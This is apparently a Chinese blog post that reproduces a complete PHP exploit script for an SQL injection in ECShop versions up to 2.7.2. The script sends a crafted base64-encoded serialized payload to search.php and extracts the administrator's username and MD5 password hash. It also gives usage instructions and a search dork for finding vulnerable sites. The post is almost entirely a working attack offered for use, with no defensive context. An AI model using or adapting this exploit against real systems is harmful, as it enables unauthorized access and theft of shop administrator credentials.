ECShop注射漏洞
EXP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 |
#!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ ECShop <= v2.7.2 SQL injection / admin credentials disclosure exploit by puret_t team: http://bbs.wolvez.org dork: "Powered by ECShop" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 3) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host: target server (ip/hostname) path: path to ecshop Example: php '.$argv[0].' localhost /ecshop/ +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $resp = send(); preg_match('#\':([\S]+):([a-z0-9]{32})\'#', $resp, $hash); if ($hash) exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n"); else exit("Exploit Failed!\n"); function send() { global $host, $path; $arr = array('attr' => array('\') AND 0 UNION SELECT (SELECT CONCAT(0x27,0x3a,user_name,0x3a,password) FROM ecs_admin_user WHERE action_list=\'all\' LIMIT 1), 1#' => 1)); $cmd = base64_encode(serialize($arr)); $data = "GET ".$path."search.php?encode=".$cmd." HTTP/1.1\r\n"; $data .= "Host: $host\r\n"; $data .= "Connection: Close\r\n\r\n"; $fp = fsockopen($host, 80); fputs($fp, $data); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?> |
没有评论
暂无评论
RSS feed for comments on this post.
对不起,该文章的评论被关闭了!